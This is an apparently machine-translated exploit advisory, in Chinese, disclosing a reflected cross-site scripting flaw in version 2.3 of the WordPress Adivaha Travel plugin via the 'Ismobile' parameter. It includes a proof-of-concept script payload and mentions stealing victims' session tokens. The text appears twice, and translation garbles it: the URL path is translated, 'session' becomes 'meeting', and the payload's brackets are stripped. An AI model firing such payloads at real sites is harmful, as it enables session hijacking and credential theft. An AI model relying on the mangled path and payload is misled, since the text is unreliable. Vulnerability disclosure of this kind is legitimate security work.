#利用标题: WordPress Adivaha Travel插件2.3-反射XSS
#利用作者:饼干
#日期: 29/07/2023
#vendor:阿迪瓦哈- 旅行科技公司
#供应商homepage: https://www.adivaha.com/
#软件link: https://wordpress.org/plugins/adiaha-hotel/
#demo: https://www.adivaha.com/demo/adivaha-online/
#版本: 2.3
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH:/移动应用/V3/
获取参数“ Ismobile”很容易受到XSS的影响
XSS PAYLOAD: CLQ95'SCRIPTALERT(1)/SCRIPTLB1RA
[-] 完毕
#利用作者:饼干
#日期: 29/07/2023
#vendor:阿迪瓦哈- 旅行科技公司
#供应商homepage: https://www.adivaha.com/
#软件link: https://wordpress.org/plugins/adiaha-hotel/
#demo: https://www.adivaha.com/demo/adivaha-online/
#版本: 2.3
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH:/移动应用/V3/
获取参数“ Ismobile”很容易受到XSS的影响
XSS PAYLOAD: CLQ95'SCRIPTALERT(1)/SCRIPTLB1RA
[-] 完毕
